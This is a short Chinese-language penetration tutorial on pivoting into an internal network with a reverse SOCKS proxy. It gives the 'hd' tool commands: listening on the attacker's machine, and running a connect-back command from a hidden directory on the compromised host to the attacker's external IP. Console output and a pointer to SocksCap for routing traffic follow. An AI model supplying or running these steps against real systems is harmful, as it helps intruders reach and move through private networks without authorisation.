反弹socks代理。

在内网渗透中，反弹socks代理是很必要的，大家都知道用lcx来转发端口，好像很少看到有人是直接反弹代理来连接。因为我们要连接内网的其 它机器，我们不可能一个一个的去中转端口连接，在当前控制的机器上开代理也没办法，因为对方在内网。所以我们就用反弹代理的方式。这种方式其实大家都明 白。

　　首先在本机监听：

　　c:/>hd -s -listen 53 1180

　　[+] Listening ConnectBack Port 53 ……

　　[+] Listen OK!

　　[+] Listening Socks5 Agent Port 1180 ……

　　[+] Listen2 OK!

　　[+] Waiting for MainSocket on port:53 ……

　　此命令是将连接进来的53端口的数据包连接到1180端口。

　　在对方机器上运行:

　　C:/RECYCLER>hd -s -connect x.x.x.x 53

　　[+] MainSocket Connect to x.x.x.x:53 Success!

　　[+] Send Main Command ok!

　　[+] Recv Main Command ok!

　　[+] Send Main Command again ok!

　　上面的x.x.x.x为你的外网ip，下面为你接收到反弹回来的代理显示的情况。

　　c:/>hd -s -listen 53 1180

　　[+] Listening ConnectBack Port 53 ……

　　[+] Listen OK!

　　[+] Listening Socks5 Agent Port 1180 ……

　　[+] Listen2 OK!

　　[+] Waiting for MainSocket on port:53 ……

　　[+] Recv Main Command Echo ok!

　　[+] Send Main Command Echo ok!

　　[+] Recv Main Command Echo again ok!

　　[+] Get a MainSocket on port 53 from x.x.x.x ……

　　[+] Waiting Client on Socks5 Agent Port:1180….

　　上面ok了，接下来在你本机安装sockscap，照下图设置就ok了。